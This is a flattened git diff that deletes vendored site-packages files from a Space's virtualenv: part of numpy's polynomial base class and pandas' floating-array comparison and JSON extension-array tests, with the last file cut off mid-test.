@abc.abstractmethod - def _int(c, m, k, lbnd, scl): - pass - - @staticmethod - @abc.abstractmethod - def _der(c, m, scl): - pass - - @staticmethod - @abc.abstractmethod - def _fit(x, y, deg, rcond, full): - pass - - @staticmethod - @abc.abstractmethod - def _line(off, scl): - pass - - @staticmethod - @abc.abstractmethod - def _roots(c): - pass - - @staticmethod - @abc.abstractmethod - def _fromroots(r): - pass - - def has_samecoef(self, other): - """Check if coefficients match. - - .. versionadded:: 1.6.0 - - Parameters - ---------- - other : class instance - The other class must have the ``coef`` attribute. - - Returns - ------- - bool : boolean - True if the coefficients are the same, False otherwise. - - """ - if len(self.coef) != len(other.coef): - return False - elif not np.all(self.coef == other.coef): - return False - else: - return True - - def has_samedomain(self, other): - """Check if domains match. - - .. versionadded:: 1.6.0 - - Parameters - ---------- - other : class instance - The other class must have the ``domain`` attribute. - - Returns - ------- - bool : boolean - True if the domains are the same, False otherwise. - - """ - return np.all(self.domain == other.domain) - - def has_samewindow(self, other): - """Check if windows match. - - .. versionadded:: 1.6.0 - - Parameters - ---------- - other : class instance - The other class must have the ``window`` attribute. - - Returns - ------- - bool : boolean - True if the windows are the same, False otherwise. - - """ - return np.all(self.window == other.window) - - def has_sametype(self, other): - """Check if types match. - - .. versionadded:: 1.7.0 - - Parameters - ---------- - other : object - Class instance. - - Returns - ------- - bool : boolean - True if other is same class as self - - """ - return isinstance(other, self.__class__) - - def _get_coefficients(self, other): - """Interpret other as polynomial coefficients. 
- - The `other` argument is checked to see if it is of the same - class as self with identical domain and window. If so, - return its coefficients, otherwise return `other`. - - .. versionadded:: 1.9.0 - - Parameters - ---------- - other : anything - Object to be checked. - - Returns - ------- - coef - The coefficients of`other` if it is a compatible instance, - of ABCPolyBase, otherwise `other`. - - Raises - ------ - TypeError - When `other` is an incompatible instance of ABCPolyBase. - - """ - if isinstance(other, ABCPolyBase): - if not isinstance(other, self.__class__): - raise TypeError("Polynomial types differ") - elif not np.all(self.domain == other.domain): - raise TypeError("Domains differ") - elif not np.all(self.window == other.window): - raise TypeError("Windows differ") - elif self.symbol != other.symbol: - raise ValueError("Polynomial symbols differ") - return other.coef - return other - - def __init__(self, coef, domain=None, window=None, symbol='x'): - [coef] = pu.as_series([coef], trim=False) - self.coef = coef - - if domain is not None: - [domain] = pu.as_series([domain], trim=False) - if len(domain) != 2: - raise ValueError("Domain has wrong number of elements.") - self.domain = domain - - if window is not None: - [window] = pu.as_series([window], trim=False) - if len(window) != 2: - raise ValueError("Window has wrong number of elements.") - self.window = window - - # Validation for symbol - try: - if not symbol.isidentifier(): - raise ValueError( - "Symbol string must be a valid Python identifier" - ) - # If a user passes in something other than a string, the above - # results in an AttributeError. Catch this and raise a more - # informative exception - except AttributeError: - raise TypeError("Symbol must be a non-empty string") - - self._symbol = symbol - - def __repr__(self): - coef = repr(self.coef)[6:-1] - domain = repr(self.domain)[6:-1] - window = repr(self.window)[6:-1] - name = self.__class__.__name__ - return (f"{name}({coef}, domain={domain}, window={window}, " - f"symbol='{self.symbol}')") - - def __format__(self, fmt_str): - if fmt_str == '': - return self.__str__() - if fmt_str not in ('ascii', 'unicode'): - raise ValueError( - f"Unsupported format string '{fmt_str}' passed to " - f"{self.__class__}.__format__. Valid options are " - f"'ascii' and 'unicode'" - ) - if fmt_str == 'ascii': - return self._generate_string(self._str_term_ascii) - return self._generate_string(self._str_term_unicode) - - def __str__(self): - if self._use_unicode: - return self._generate_string(self._str_term_unicode) - return self._generate_string(self._str_term_ascii) - - def _generate_string(self, term_method): - """ - Generate the full string representation of the polynomial, using - ``term_method`` to generate each polynomial term. - """ - # Get configuration for line breaks - linewidth = np.get_printoptions().get('linewidth', 75) - if linewidth < 1: - linewidth = 1 - out = pu.format_float(self.coef[0]) - for i, coef in enumerate(self.coef[1:]): - out += " " - power = str(i + 1) - # Polynomial coefficient - # The coefficient array can be an object array with elements that - # will raise a TypeError with >= 0 (e.g. strings or Python - # complex). In this case, represent the coefficient as-is. 
- try: - if coef >= 0: - next_term = f"+ " + pu.format_float(coef, parens=True) - else: - next_term = f"- " + pu.format_float(-coef, parens=True) - except TypeError: - next_term = f"+ {coef}" - # Polynomial term - next_term += term_method(power, self.symbol) - # Length of the current line with next term added - line_len = len(out.split('\n')[-1]) + len(next_term) - # If not the last term in the polynomial, it will be two - # characters longer due to the +/- with the next term - if i < len(self.coef[1:]) - 1: - line_len += 2 - # Handle linebreaking - if line_len >= linewidth: - next_term = next_term.replace(" ", "\n", 1) - out += next_term - return out - - @classmethod - def _str_term_unicode(cls, i, arg_str): - """ - String representation of single polynomial term using unicode - characters for superscripts and subscripts. - """ - if cls.basis_name is None: - raise NotImplementedError( - "Subclasses must define either a basis_name, or override " - "_str_term_unicode(cls, i, arg_str)" - ) - return (f"·{cls.basis_name}{i.translate(cls._subscript_mapping)}" - f"({arg_str})") - - @classmethod - def _str_term_ascii(cls, i, arg_str): - """ - String representation of a single polynomial term using ** and _ to - represent superscripts and subscripts, respectively. - """ - if cls.basis_name is None: - raise NotImplementedError( - "Subclasses must define either a basis_name, or override " - "_str_term_ascii(cls, i, arg_str)" - ) - return f" {cls.basis_name}_{i}({arg_str})" - - @classmethod - def _repr_latex_term(cls, i, arg_str, needs_parens): - if cls.basis_name is None: - raise NotImplementedError( - "Subclasses must define either a basis name, or override " - "_repr_latex_term(i, arg_str, needs_parens)") - # since we always add parens, we don't care if the expression needs them - return f"{{{cls.basis_name}}}_{{{i}}}({arg_str})" - - @staticmethod - def _repr_latex_scalar(x, parens=False): - # TODO: we're stuck with disabling math formatting until we handle - # exponents in this function - return r'\text{{{}}}'.format(pu.format_float(x, parens=parens)) - - def _repr_latex_(self): - # get the scaled argument string to the basis functions - off, scale = self.mapparms() - if off == 0 and scale == 1: - term = self.symbol - needs_parens = False - elif scale == 1: - term = f"{self._repr_latex_scalar(off)} + {self.symbol}" - needs_parens = True - elif off == 0: - term = f"{self._repr_latex_scalar(scale)}{self.symbol}" - needs_parens = True - else: - term = ( - f"{self._repr_latex_scalar(off)} + " - f"{self._repr_latex_scalar(scale)}{self.symbol}" - ) - needs_parens = True - - mute = r"\color{{LightGray}}{{{}}}".format - - parts = [] - for i, c in enumerate(self.coef): - # prevent duplication of + and - signs - if i == 0: - coef_str = f"{self._repr_latex_scalar(c)}" - elif not isinstance(c, numbers.Real): - coef_str = f" + ({self._repr_latex_scalar(c)})" - elif not np.signbit(c): - coef_str = f" + {self._repr_latex_scalar(c, parens=True)}" - else: - coef_str = f" - {self._repr_latex_scalar(-c, parens=True)}" - - # produce the string for the term - term_str = self._repr_latex_term(i, term, needs_parens) - if term_str == '1': - part = coef_str - else: - part = rf"{coef_str}\,{term_str}" - - if c == 0: - part = mute(part) - - parts.append(part) - - if parts: - body = ''.join(parts) - else: - # in case somehow there are no coefficients at all - body = '0' - - return rf"${self.symbol} \mapsto {body}$" - - - - # Pickle and copy - - def __getstate__(self): - ret = self.__dict__.copy() - ret['coef'] = 
self.coef.copy() - ret['domain'] = self.domain.copy() - ret['window'] = self.window.copy() - ret['symbol'] = self.symbol - return ret - - def __setstate__(self, dict): - self.__dict__ = dict - - # Call - - def __call__(self, arg): - off, scl = pu.mapparms(self.domain, self.window) - arg = off + scl*arg - return self._val(arg, self.coef) - - def __iter__(self): - return iter(self.coef) - - def __len__(self): - return len(self.coef) - - # Numeric properties. - - def __neg__(self): - return self.__class__( - -self.coef, self.domain, self.window, self.symbol - ) - - def __pos__(self): - return self - - def __add__(self, other): - othercoef = self._get_coefficients(other) - try: - coef = self._add(self.coef, othercoef) - except Exception: - return NotImplemented - return self.__class__(coef, self.domain, self.window, self.symbol) - - def __sub__(self, other): - othercoef = self._get_coefficients(other) - try: - coef = self._sub(self.coef, othercoef) - except Exception: - return NotImplemented - return self.__class__(coef, self.domain, self.window, self.symbol) - - def __mul__(self, other): - othercoef = self._get_coefficients(other) - try: - coef = self._mul(self.coef, othercoef) - except Exception: - return NotImplemented - return self.__class__(coef, self.domain, self.window, self.symbol) - - def __truediv__(self, other): - # there is no true divide if the rhs is not a Number, although it - # could return the first n elements of an infinite series. - # It is hard to see where n would come from, though. - if not isinstance(other, numbers.Number) or isinstance(other, bool): - raise TypeError( - f"unsupported types for true division: " - f"'{type(self)}', '{type(other)}'" - ) - return self.__floordiv__(other) - - def __floordiv__(self, other): - res = self.__divmod__(other) - if res is NotImplemented: - return res - return res[0] - - def __mod__(self, other): - res = self.__divmod__(other) - if res is NotImplemented: - return res - return res[1] - - def __divmod__(self, other): - othercoef = self._get_coefficients(other) - try: - quo, rem = self._div(self.coef, othercoef) - except ZeroDivisionError: - raise - except Exception: - return NotImplemented - quo = self.__class__(quo, self.domain, self.window, self.symbol) - rem = self.__class__(rem, self.domain, self.window, self.symbol) - return quo, rem - - def __pow__(self, other): - coef = self._pow(self.coef, other, maxpower=self.maxpower) - res = self.__class__(coef, self.domain, self.window, self.symbol) - return res - - def __radd__(self, other): - try: - coef = self._add(other, self.coef) - except Exception: - return NotImplemented - return self.__class__(coef, self.domain, self.window, self.symbol) - - def __rsub__(self, other): - try: - coef = self._sub(other, self.coef) - except Exception: - return NotImplemented - return self.__class__(coef, self.domain, self.window, self.symbol) - - def __rmul__(self, other): - try: - coef = self._mul(other, self.coef) - except Exception: - return NotImplemented - return self.__class__(coef, self.domain, self.window, self.symbol) - - def __rdiv__(self, other): - # set to __floordiv__ /. - return self.__rfloordiv__(other) - - def __rtruediv__(self, other): - # An instance of ABCPolyBase is not considered a - # Number. 
- return NotImplemented - - def __rfloordiv__(self, other): - res = self.__rdivmod__(other) - if res is NotImplemented: - return res - return res[0] - - def __rmod__(self, other): - res = self.__rdivmod__(other) - if res is NotImplemented: - return res - return res[1] - - def __rdivmod__(self, other): - try: - quo, rem = self._div(other, self.coef) - except ZeroDivisionError: - raise - except Exception: - return NotImplemented - quo = self.__class__(quo, self.domain, self.window, self.symbol) - rem = self.__class__(rem, self.domain, self.window, self.symbol) - return quo, rem - - def __eq__(self, other): - res = (isinstance(other, self.__class__) and - np.all(self.domain == other.domain) and - np.all(self.window == other.window) and - (self.coef.shape == other.coef.shape) and - np.all(self.coef == other.coef) and - (self.symbol == other.symbol)) - return res - - def __ne__(self, other): - return not self.__eq__(other) - - # - # Extra methods. - # - - def copy(self): - """Return a copy. - - Returns - ------- - new_series : series - Copy of self. - - """ - return self.__class__(self.coef, self.domain, self.window, self.symbol) - - def degree(self): - """The degree of the series. - - .. versionadded:: 1.5.0 - - Returns - ------- - degree : int - Degree of the series, one less than the number of coefficients. - - Examples - -------- - - Create a polynomial object for ``1 + 7*x + 4*x**2``: - - >>> poly = np.polynomial.Polynomial([1, 7, 4]) - >>> print(poly) - 1.0 + 7.0·x + 4.0·x² - >>> poly.degree() - 2 - - Note that this method does not check for non-zero coefficients. - You must trim the polynomial to remove any trailing zeroes: - - >>> poly = np.polynomial.Polynomial([1, 7, 0]) - >>> print(poly) - 1.0 + 7.0·x + 0.0·x² - >>> poly.degree() - 2 - >>> poly.trim().degree() - 1 - - """ - return len(self) - 1 - - def cutdeg(self, deg): - """Truncate series to the given degree. - - Reduce the degree of the series to `deg` by discarding the - high order terms. If `deg` is greater than the current degree a - copy of the current series is returned. This can be useful in least - squares where the coefficients of the high degree terms may be very - small. - - .. versionadded:: 1.5.0 - - Parameters - ---------- - deg : non-negative int - The series is reduced to degree `deg` by discarding the high - order terms. The value of `deg` must be a non-negative integer. - - Returns - ------- - new_series : series - New instance of series with reduced degree. - - """ - return self.truncate(deg + 1) - - def trim(self, tol=0): - """Remove trailing coefficients - - Remove trailing coefficients until a coefficient is reached whose - absolute value greater than `tol` or the beginning of the series is - reached. If all the coefficients would be removed the series is set - to ``[0]``. A new series instance is returned with the new - coefficients. The current instance remains unchanged. - - Parameters - ---------- - tol : non-negative number. - All trailing coefficients less than `tol` will be removed. - - Returns - ------- - new_series : series - New instance of series with trimmed coefficients. - - """ - coef = pu.trimcoef(self.coef, tol) - return self.__class__(coef, self.domain, self.window, self.symbol) - - def truncate(self, size): - """Truncate series to length `size`. - - Reduce the series to length `size` by discarding the high - degree terms. The value of `size` must be a positive integer. This - can be useful in least squares where the coefficients of the - high degree terms may be very small. 
- - Parameters - ---------- - size : positive int - The series is reduced to length `size` by discarding the high - degree terms. The value of `size` must be a positive integer. - - Returns - ------- - new_series : series - New instance of series with truncated coefficients. - - """ - isize = int(size) - if isize != size or isize < 1: - raise ValueError("size must be a positive integer") - if isize >= len(self.coef): - coef = self.coef - else: - coef = self.coef[:isize] - return self.__class__(coef, self.domain, self.window, self.symbol) - - def convert(self, domain=None, kind=None, window=None): - """Convert series to a different kind and/or domain and/or window. - - Parameters - ---------- - domain : array_like, optional - The domain of the converted series. If the value is None, - the default domain of `kind` is used. - kind : class, optional - The polynomial series type class to which the current instance - should be converted. If kind is None, then the class of the - current instance is used. - window : array_like, optional - The window of the converted series. If the value is None, - the default window of `kind` is used. - - Returns - ------- - new_series : series - The returned class can be of different type than the current - instance and/or have a different domain and/or different - window. - - Notes - ----- - Conversion between domains and class types can result in - numerically ill defined series. - - """ - if kind is None: - kind = self.__class__ - if domain is None: - domain = kind.domain - if window is None: - window = kind.window - return self(kind.identity(domain, window=window, symbol=self.symbol)) - - def mapparms(self): - """Return the mapping parameters. - - The returned values define a linear map ``off + scl*x`` that is - applied to the input arguments before the series is evaluated. The - map depends on the ``domain`` and ``window``; if the current - ``domain`` is equal to the ``window`` the resulting map is the - identity. If the coefficients of the series instance are to be - used by themselves outside this class, then the linear function - must be substituted for the ``x`` in the standard representation of - the base polynomials. - - Returns - ------- - off, scl : float or complex - The mapping function is defined by ``off + scl*x``. - - Notes - ----- - If the current domain is the interval ``[l1, r1]`` and the window - is ``[l2, r2]``, then the linear mapping function ``L`` is - defined by the equations:: - - L(l1) = l2 - L(r1) = r2 - - """ - return pu.mapparms(self.domain, self.window) - - def integ(self, m=1, k=[], lbnd=None): - """Integrate. - - Return a series instance that is the definite integral of the - current series. - - Parameters - ---------- - m : non-negative int - The number of integrations to perform. - k : array_like - Integration constants. The first constant is applied to the - first integration, the second to the second, and so on. The - list of values must less than or equal to `m` in length and any - missing values are set to zero. - lbnd : Scalar - The lower bound of the definite integral. - - Returns - ------- - new_series : series - A new series representing the integral. The domain is the same - as the domain of the integrated series. - - """ - off, scl = self.mapparms() - if lbnd is None: - lbnd = 0 - else: - lbnd = off + scl*lbnd - coef = self._int(self.coef, m, k, lbnd, 1./scl) - return self.__class__(coef, self.domain, self.window, self.symbol) - - def deriv(self, m=1): - """Differentiate. 
- - Return a series instance of that is the derivative of the current - series. - - Parameters - ---------- - m : non-negative int - Find the derivative of order `m`. - - Returns - ------- - new_series : series - A new series representing the derivative. The domain is the same - as the domain of the differentiated series. - - """ - off, scl = self.mapparms() - coef = self._der(self.coef, m, scl) - return self.__class__(coef, self.domain, self.window, self.symbol) - - def roots(self): - """Return the roots of the series polynomial. - - Compute the roots for the series. Note that the accuracy of the - roots decreases the further outside the `domain` they lie. - - Returns - ------- - roots : ndarray - Array containing the roots of the series. - - """ - roots = self._roots(self.coef) - return pu.mapdomain(roots, self.window, self.domain) - - def linspace(self, n=100, domain=None): - """Return x, y values at equally spaced points in domain. - - Returns the x, y values at `n` linearly spaced points across the - domain. Here y is the value of the polynomial at the points x. By - default the domain is the same as that of the series instance. - This method is intended mostly as a plotting aid. - - .. versionadded:: 1.5.0 - - Parameters - ---------- - n : int, optional - Number of point pairs to return. The default value is 100. - domain : {None, array_like}, optional - If not None, the specified domain is used instead of that of - the calling instance. It should be of the form ``[beg,end]``. - The default is None which case the class domain is used. - - Returns - ------- - x, y : ndarray - x is equal to linspace(self.domain[0], self.domain[1], n) and - y is the series evaluated at element of x. - - """ - if domain is None: - domain = self.domain - x = np.linspace(domain[0], domain[1], n) - y = self(x) - return x, y - - @classmethod - def fit(cls, x, y, deg, domain=None, rcond=None, full=False, w=None, - window=None, symbol='x'): - """Least squares fit to data. - - Return a series instance that is the least squares fit to the data - `y` sampled at `x`. The domain of the returned instance can be - specified and this will often result in a superior fit with less - chance of ill conditioning. - - Parameters - ---------- - x : array_like, shape (M,) - x-coordinates of the M sample points ``(x[i], y[i])``. - y : array_like, shape (M,) - y-coordinates of the M sample points ``(x[i], y[i])``. - deg : int or 1-D array_like - Degree(s) of the fitting polynomials. If `deg` is a single integer - all terms up to and including the `deg`'th term are included in the - fit. For NumPy versions >= 1.11.0 a list of integers specifying the - degrees of the terms to include may be used instead. - domain : {None, [beg, end], []}, optional - Domain to use for the returned series. If ``None``, - then a minimal domain that covers the points `x` is chosen. If - ``[]`` the class domain is used. The default value was the - class domain in NumPy 1.4 and ``None`` in later versions. - The ``[]`` option was added in numpy 1.5.0. - rcond : float, optional - Relative condition number of the fit. Singular values smaller - than this relative to the largest singular value will be - ignored. The default value is len(x)*eps, where eps is the - relative precision of the float type, about 2e-16 in most - cases. - full : bool, optional - Switch determining nature of return value. When it is False - (the default) just the coefficients are returned, when True - diagnostic information from the singular value decomposition is - also returned. 
- w : array_like, shape (M,), optional - Weights. If not None, the weight ``w[i]`` applies to the unsquared - residual ``y[i] - y_hat[i]`` at ``x[i]``. Ideally the weights are - chosen so that the errors of the products ``w[i]*y[i]`` all have - the same variance. When using inverse-variance weighting, use - ``w[i] = 1/sigma(y[i])``. The default value is None. - - .. versionadded:: 1.5.0 - window : {[beg, end]}, optional - Window to use for the returned series. The default - value is the default class domain - - .. versionadded:: 1.6.0 - symbol : str, optional - Symbol representing the independent variable. Default is 'x'. - - Returns - ------- - new_series : series - A series that represents the least squares fit to the data and - has the domain and window specified in the call. If the - coefficients for the unscaled and unshifted basis polynomials are - of interest, do ``new_series.convert().coef``. - - [resid, rank, sv, rcond] : list - These values are only returned if ``full == True`` - - - resid -- sum of squared residuals of the least squares fit - - rank -- the numerical rank of the scaled Vandermonde matrix - - sv -- singular values of the scaled Vandermonde matrix - - rcond -- value of `rcond`. - - For more details, see `linalg.lstsq`. - - """ - if domain is None: - domain = pu.getdomain(x) - elif type(domain) is list and len(domain) == 0: - domain = cls.domain - - if window is None: - window = cls.window - - xnew = pu.mapdomain(x, domain, window) - res = cls._fit(xnew, y, deg, w=w, rcond=rcond, full=full) - if full: - [coef, status] = res - return ( - cls(coef, domain=domain, window=window, symbol=symbol), status - ) - else: - coef = res - return cls(coef, domain=domain, window=window, symbol=symbol) - - @classmethod - def fromroots(cls, roots, domain=[], window=None, symbol='x'): - """Return series instance that has the specified roots. - - Returns a series representing the product - ``(x - r[0])*(x - r[1])*...*(x - r[n-1])``, where ``r`` is a - list of roots. - - Parameters - ---------- - roots : array_like - List of roots. - domain : {[], None, array_like}, optional - Domain for the resulting series. If None the domain is the - interval from the smallest root to the largest. If [] the - domain is the class domain. The default is []. - window : {None, array_like}, optional - Window for the returned series. If None the class window is - used. The default is None. - symbol : str, optional - Symbol representing the independent variable. Default is 'x'. - - Returns - ------- - new_series : series - Series with the specified roots. - - """ - [roots] = pu.as_series([roots], trim=False) - if domain is None: - domain = pu.getdomain(roots) - elif type(domain) is list and len(domain) == 0: - domain = cls.domain - - if window is None: - window = cls.window - - deg = len(roots) - off, scl = pu.mapparms(domain, window) - rnew = off + scl*roots - coef = cls._fromroots(rnew) / scl**deg - return cls(coef, domain=domain, window=window, symbol=symbol) - - @classmethod - def identity(cls, domain=None, window=None, symbol='x'): - """Identity function. - - If ``p`` is the returned series, then ``p(x) == x`` for all - values of x. - - Parameters - ---------- - domain : {None, array_like}, optional - If given, the array must be of the form ``[beg, end]``, where - ``beg`` and ``end`` are the endpoints of the domain. If None is - given then the class domain is used. The default is None. 
- window : {None, array_like}, optional - If given, the resulting array must be if the form - ``[beg, end]``, where ``beg`` and ``end`` are the endpoints of - the window. If None is given then the class window is used. The - default is None. - symbol : str, optional - Symbol representing the independent variable. Default is 'x'. - - Returns - ------- - new_series : series - Series of representing the identity. - - """ - if domain is None: - domain = cls.domain - if window is None: - window = cls.window - off, scl = pu.mapparms(window, domain) - coef = cls._line(off, scl) - return cls(coef, domain, window, symbol) - - @classmethod - def basis(cls, deg, domain=None, window=None, symbol='x'): - """Series basis polynomial of degree `deg`. - - Returns the series representing the basis polynomial of degree `deg`. - - .. versionadded:: 1.7.0 - - Parameters - ---------- - deg : int - Degree of the basis polynomial for the series. Must be >= 0. - domain : {None, array_like}, optional - If given, the array must be of the form ``[beg, end]``, where - ``beg`` and ``end`` are the endpoints of the domain. If None is - given then the class domain is used. The default is None. - window : {None, array_like}, optional - If given, the resulting array must be if the form - ``[beg, end]``, where ``beg`` and ``end`` are the endpoints of - the window. If None is given then the class window is used. The - default is None. - symbol : str, optional - Symbol representing the independent variable. Default is 'x'. - - Returns - ------- - new_series : series - A series with the coefficient of the `deg` term set to one and - all others zero. - - """ - if domain is None: - domain = cls.domain - if window is None: - window = cls.window - ideg = int(deg) - - if ideg != deg or ideg < 0: - raise ValueError("deg must be non-negative integer") - return cls([0]*ideg + [1], domain, window, symbol) - - @classmethod - def cast(cls, series, domain=None, window=None): - """Convert series to series of this class. - - The `series` is expected to be an instance of some polynomial - series of one of the types supported by by the numpy.polynomial - module, but could be some other class that supports the convert - method. - - .. versionadded:: 1.7.0 - - Parameters - ---------- - series : series - The series instance to be converted. - domain : {None, array_like}, optional - If given, the array must be of the form ``[beg, end]``, where - ``beg`` and ``end`` are the endpoints of the domain. If None is - given then the class domain is used. The default is None. - window : {None, array_like}, optional - If given, the resulting array must be if the form - ``[beg, end]``, where ``beg`` and ``end`` are the endpoints of - the window. If None is given then the class window is used. The - default is None. - - Returns - ------- - new_series : series - A series of the same kind as the calling class and equal to - `series` when evaluated. 
- - See Also - -------- - convert : similar instance method - - """ - if domain is None: - domain = cls.domain - if window is None: - window = cls.window - return series.convert(domain, cls, window) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/arrays/floating/test_comparison.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/arrays/floating/test_comparison.py deleted file mode 100644 index a429649f1ce1dc10fc9610faa73a81dd94255b37..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/arrays/floating/test_comparison.py +++ /dev/null @@ -1,65 +0,0 @@ -import numpy as np -import pytest - -import pandas as pd -import pandas._testing as tm -from pandas.core.arrays import FloatingArray -from pandas.tests.arrays.masked_shared import ( - ComparisonOps, - NumericOps, -) - - -class TestComparisonOps(NumericOps, ComparisonOps): - @pytest.mark.parametrize("other", [True, False, pd.NA, -1.0, 0.0, 1]) - def test_scalar(self, other, comparison_op, dtype): - ComparisonOps.test_scalar(self, other, comparison_op, dtype) - - def test_compare_with_integerarray(self, comparison_op): - op = comparison_op - a = pd.array([0, 1, None] * 3, dtype="Int64") - b = pd.array([0] * 3 + [1] * 3 + [None] * 3, dtype="Float64") - other = b.astype("Int64") - expected = op(a, other) - result = op(a, b) - tm.assert_extension_array_equal(result, expected) - expected = op(other, a) - result = op(b, a) - tm.assert_extension_array_equal(result, expected) - - -def test_equals(): - # GH-30652 - # equals is generally tested in /tests/extension/base/methods, but this - # specifically tests that two arrays of the same class but different dtype - # do not evaluate equal - a1 = pd.array([1, 2, None], dtype="Float64") - a2 = pd.array([1, 2, None], dtype="Float32") - assert a1.equals(a2) is False - - -def test_equals_nan_vs_na(): - # GH#44382 - - mask = np.zeros(3, dtype=bool) - data = np.array([1.0, np.nan, 3.0], dtype=np.float64) - - left = FloatingArray(data, mask) - assert left.equals(left) - tm.assert_extension_array_equal(left, left) - - assert left.equals(left.copy()) - assert left.equals(FloatingArray(data.copy(), mask.copy())) - - mask2 = np.array([False, True, False], dtype=bool) - data2 = np.array([1.0, 2.0, 3.0], dtype=np.float64) - right = FloatingArray(data2, mask2) - assert right.equals(right) - tm.assert_extension_array_equal(right, right) - - assert not left.equals(right) - - # with mask[1] = True, the only difference is data[1], which should - # not matter for equals - mask[1] = True - assert left.equals(right) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/extension/json/test_json.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/extension/json/test_json.py deleted file mode 100644 index 9e1a4fb5da2512213fe0dd110af8eb9b897caceb..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/extension/json/test_json.py +++ /dev/null @@ -1,379 +0,0 @@ -import collections -import operator -import sys - -import pytest - -import pandas as pd -import pandas._testing as tm -from pandas.tests.extension import base -from pandas.tests.extension.json.array import ( - JSONArray, - JSONDtype, - make_data, -) - - -@pytest.fixture -def dtype(): - return JSONDtype() - - -@pytest.fixture -def data(): - """Length-100 PeriodArray for semantics test.""" - data = 
make_data() - - # Why the while loop? NumPy is unable to construct an ndarray from - # equal-length ndarrays. Many of our operations involve coercing the - # EA to an ndarray of objects. To avoid random test failures, we ensure - # that our data is coercible to an ndarray. Several tests deal with only - # the first two elements, so that's what we'll check. - - while len(data[0]) == len(data[1]): - data = make_data() - - return JSONArray(data) - - -@pytest.fixture -def data_missing(): - """Length 2 array with [NA, Valid]""" - return JSONArray([{}, {"a": 10}]) - - -@pytest.fixture -def data_for_sorting(): - return JSONArray([{"b": 1}, {"c": 4}, {"a": 2, "c": 3}]) - - -@pytest.fixture -def data_missing_for_sorting(): - return JSONArray([{"b": 1}, {}, {"a": 4}]) - - -@pytest.fixture -def na_cmp(): - return operator.eq - - -@pytest.fixture -def data_for_grouping(): - return JSONArray( - [ - {"b": 1}, - {"b": 1}, - {}, - {}, - {"a": 0, "c": 2}, - {"a": 0, "c": 2}, - {"b": 1}, - {"c": 2}, - ] - ) - - -class BaseJSON: - pass - - -class TestDtype(BaseJSON, base.BaseDtypeTests): - pass - - -class TestInterface(BaseJSON, base.BaseInterfaceTests): - @pytest.mark.xfail( - reason="comparison method not implemented for JSONArray (GH-37867)" - ) - def test_contains(self, data): - # GH-37867 - super().test_contains(data) - - -class TestConstructors(BaseJSON, base.BaseConstructorsTests): - @pytest.mark.xfail(reason="not implemented constructor from dtype") - def test_from_dtype(self, data): - # construct from our dtype & string dtype - super().test_from_dtype(data) - - @pytest.mark.xfail(reason="RecursionError, GH-33900") - def test_series_constructor_no_data_with_index(self, dtype, na_value): - # RecursionError: maximum recursion depth exceeded in comparison - rec_limit = sys.getrecursionlimit() - try: - # Limit to avoid stack overflow on Windows CI - sys.setrecursionlimit(100) - super().test_series_constructor_no_data_with_index(dtype, na_value) - finally: - sys.setrecursionlimit(rec_limit) - - @pytest.mark.xfail(reason="RecursionError, GH-33900") - def test_series_constructor_scalar_na_with_index(self, dtype, na_value): - # RecursionError: maximum recursion depth exceeded in comparison - rec_limit = sys.getrecursionlimit() - try: - # Limit to avoid stack overflow on Windows CI - sys.setrecursionlimit(100) - super().test_series_constructor_scalar_na_with_index(dtype, na_value) - finally: - sys.setrecursionlimit(rec_limit) - - @pytest.mark.xfail(reason="collection as scalar, GH-33901") - def test_series_constructor_scalar_with_index(self, data, dtype): - # TypeError: All values must be of type - rec_limit = sys.getrecursionlimit() - try: - # Limit to avoid stack overflow on Windows CI - sys.setrecursionlimit(100) - super().test_series_constructor_scalar_with_index(data, dtype) - finally: - sys.setrecursionlimit(rec_limit) - - -class TestReshaping(BaseJSON, base.BaseReshapingTests): - @pytest.mark.xfail(reason="Different definitions of NA") - def test_stack(self): - """ - The test does .astype(object).stack(future_stack=True). If we happen to have - any missing values in `data`, then we'll end up with different - rows since we consider `{}` NA, but `.astype(object)` doesn't. - """ - super().test_stack() - - @pytest.mark.xfail(reason="dict for NA") - def test_unstack(self, data, index): - # The base test has NaN for the expected NA value. 
- # this matches otherwise - return super().test_unstack(data, index) - - -class TestGetitem(BaseJSON, base.BaseGetitemTests): - pass - - -class TestIndex(BaseJSON, base.BaseIndexTests): - pass - - -class TestMissing(BaseJSON, base.BaseMissingTests): - @pytest.mark.xfail(reason="Setting a dict as a scalar") - def test_fillna_series(self): - """We treat dictionaries as a mapping in fillna, not a scalar.""" - super().test_fillna_series() - - @pytest.mark.xfail(reason="Setting a dict as a scalar") - def test_fillna_frame(self): - """We treat dictionaries as a mapping in fillna, not a scalar.""" - super().test_fillna_frame() - - -unhashable = pytest.mark.xfail(reason="Unhashable") - - -class TestReduce(base.BaseReduceTests): - pass - - -class TestMethods(BaseJSON, base.BaseMethodsTests): - @unhashable - def test_value_counts(self, all_data, dropna): - super().test_value_counts(all_data, dropna) - - @unhashable - def test_value_counts_with_normalize(self, data): - super().test_value_counts_with_normalize(data) - - @unhashable - def test_sort_values_frame(self): - # TODO (EA.factorize): see if _values_for_factorize allows this. - super().test_sort_values_frame() - - @pytest.mark.parametrize("ascending", [True, False]) - def test_sort_values(self, data_for_sorting, ascending, sort_by_key): - super().test_sort_values(data_for_sorting, ascending, sort_by_key) - - @pytest.mark.parametrize("ascending", [True, False]) - def test_sort_values_missing( - self, data_missing_for_sorting, ascending, sort_by_key - ): - super().test_sort_values_missing( - data_missing_for_sorting, ascending, sort_by_key - ) - - @pytest.mark.xfail(reason="combine for JSONArray not supported") - def test_combine_le(self, data_repeated): - super().test_combine_le(data_repeated) - - @pytest.mark.xfail( - reason="combine for JSONArray not supported - " - "may pass depending on random data", - strict=False, - raises=AssertionError, - ) - def test_combine_first(self, data): - super().test_combine_first(data) - - @pytest.mark.xfail(reason="broadcasting error") - def test_where_series(self, data, na_value): - # Fails with - # *** ValueError: operands could not be broadcast together - # with shapes (4,) (4,) (0,) - super().test_where_series(data, na_value) - - @pytest.mark.xfail(reason="Can't compare dicts.") - def test_searchsorted(self, data_for_sorting): - super().test_searchsorted(data_for_sorting) - - @pytest.mark.xfail(reason="Can't compare 